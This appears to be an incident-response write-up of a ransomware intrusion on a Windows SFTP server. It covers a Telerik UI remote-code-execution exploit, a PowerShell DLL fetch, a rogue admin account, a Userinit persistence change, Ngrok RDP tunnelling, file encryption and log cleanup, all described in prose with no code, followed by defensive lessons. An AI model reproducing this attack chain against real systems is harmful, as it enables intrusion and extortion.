Incident Overview
A ransomware attack was investigated on a Windows Server 2012 configured for SFTP operations. The attackers exploited a vulnerability in the Telerik UI for ASP.NET AJAX, which allowed for remote code execution (RCE). This incident escalated from gaining access to the system to preparing and deploying ransomware, with a peculiar diversion to Pornhub during the execution.
Background
The environment under scrutiny was a Windows Server 2012 setup focusing solely on SFTP. Security measures included default Windows Defender settings and the event log default sizes. The primary goal was to pinpoint how the attackers infiltrated the system and the activities that transpired during their stay.
Exploitation and Initial Access
The server was running an outdated version of Telerik UI, specifically 2016.1.225.45, which is vulnerable to CVE-2019-18935, a critical RCE vulnerability. The attackers exploited this weakness to upload and execute arbitrary files on the server.
Within two weeks, suspicious activity was noted when an InvalidCastException emerged in application logs. After several probes, the attackers successfully dropped a malicious file named ‘wondershare.tmp.tmp’ into the temp directory, followed by fetching a DLL file via PowerShell from a malicious domain.
Establishing Control
Following the successful upload, attackers created a local admin account named "Depeloyadmin," notable for its unintentional misspelling. They also modified the Winlogon Userinit key to execute a rogue userinit.exe from the temp folder and opened port 3389 for Remote Desktop Protocol (RDP).
Reconnaissance and Return
After a short hiatus, the attackers re-entered using the same exploit to drop a tunneling client, Ngrok.exe, facilitating RDP access back into the system. They established local administrative access via RDP and maintained a connection that resulted in significant data transfer indicative of active RDP sessions.
Execution of Ransomware
Upon gaining control, the attackers executed a rapid encryption of files, renaming them with the .sil3ncer extension, and dropped ransom notes titled SORRY-FOR-FILES.txt across numerous directories. The notes prompted the user to contact the attackers via Telegram without a formal ransom payment portal.
Interestingly, around the same time, forensic evidence indicated a quick visit to Pornhub, suggesting either an attempt to obscure their activities or a diversion of focus while deploying the ransomware.
Cleanup and Exit Strategy
To erase traces of their actions, the attackers executed a cleanup script named clear.bat and deleted the rogue admin account. This meticulous step further minimized their digital footprint, leaving behind very few logs.
Lessons Learned
- Patch Regularly: Continuous updates of third-party components can close well-known vulnerabilities.
- Enhance Logging: Improving event log size and retention helps prevent loss of critical data during an incident.
- Monitor Commands: Watch for suspicious PowerShell and network firewall manipulation commands.
- Block Tunneling Services: Prohibit tools like Ngrok unless necessary, reducing the risk of unauthorized access methods.
- Secure Remote Access: Enforce stringent controls over RDP access to avoid unauthorized internal re-enabling of connections.
Conclusion
The incident illustrates the dangers of outdated software and the importance of robust security practices. By ensuring regular updates, diligent monitoring, and enhanced security controls, organizations can mitigate risks of similar attacks. If your server logs indicate unexpected behavior—like an SFTP server entangled with browsing histories of adult sites—it’s a clear sign that your outbound rules require urgent revision.